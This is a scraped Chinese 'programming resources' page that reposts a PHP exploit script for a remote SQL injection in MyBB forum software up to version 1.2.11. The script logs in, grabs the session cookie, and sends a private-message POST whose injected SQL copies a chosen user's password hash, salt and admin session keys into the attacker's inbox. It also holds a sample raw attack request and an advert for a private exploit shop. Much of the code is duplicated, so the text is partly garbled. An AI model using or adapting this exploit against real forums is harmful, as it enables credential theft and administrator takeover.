您现在的位置是:网站首页> 编程资料编程资料
MyBulletinBoard (MyBB) _Exploit_网络安全_
2023-05-24
372人已围观
简介 MyBulletinBoard (MyBB) _Exploit_网络安全_
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with <3 from ru_antichat',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=4),(select password from mybb_users where uid=4),(select salt from mybb_users where uid=4),admin_sid',(select sid from mybb_adminsessions where uid=4),'admin_loginkey',(select loginkey from mybb_adminsessions where uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08 error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache"); ?>
mybb 1.2.11 xek
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
} if (!$_GET)
{
echo
'';
}
if (isset($_GET['f**k_mybb']))
{
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http://localhost/mybb_1210/index.php'; function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
} echo '
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with <3 from ru_antichat',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=4),(select password from mybb_users where uid=4),(select salt from mybb_users where uid=4),admin_sid',(select sid from mybb_adminsessions where uid=4),'admin_loginkey',(select loginkey from mybb_adminsessions where uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08 error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache"); ?>
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
} if (!$_GET)
{
echo
'';
}
if (isset($_GET['f**k_mybb']))
{
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http://localhost/mybb_1210/index.php'; function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
} echo '
- start....';
myflush(50000); $get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'f**kkk');
echo '- login '.$username.' with passwd = '.$pwd.' done';
myflush(50000); foreach ($get_cookie as $value)
{
if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
{
$value = explode(";", $value);
$cookie = strstr($value[0], 'mybbuser');
break;
}
}
echo '- cookie: '.$cookie;
myflush(50000); preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '- user id: '.$get_uid;
myflush(50000); $data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with <3 from antichat.ru',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=$uid_needed),(select password from mybb_users where uid=$uid_needed),(select salt from mybb_users where uid=$uid_needed),' admin sid',(select sid from mybb_adminsessions where uid=$uid_needed),' admin loginkey',(select loginkey from mybb_adminsessions where uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '- send exploit:
-------------------
'.$send_http.'
-------------------
look you private messages 4 admin passwd hash http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'';
}
?>
相关内容
- Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit _Exploit_网络安全_
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit _Exploit_网络安全_
- pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit _Exploit_网络安全_
- Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit _Exploit_网络安全_
- The Personal FTP Server 6.0f RETR Denial of Service Exploit _Exploit_网络安全_
- Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) _Exploit_网络安全_
- DESlock _Exploit_网络安全_
- Debian Sarge Multiple IMAP Server Denial of Service Exploit _Exploit_网络安全_
- DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit _Exploit_网络安全_
- Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack) _Exploit_网络安全_
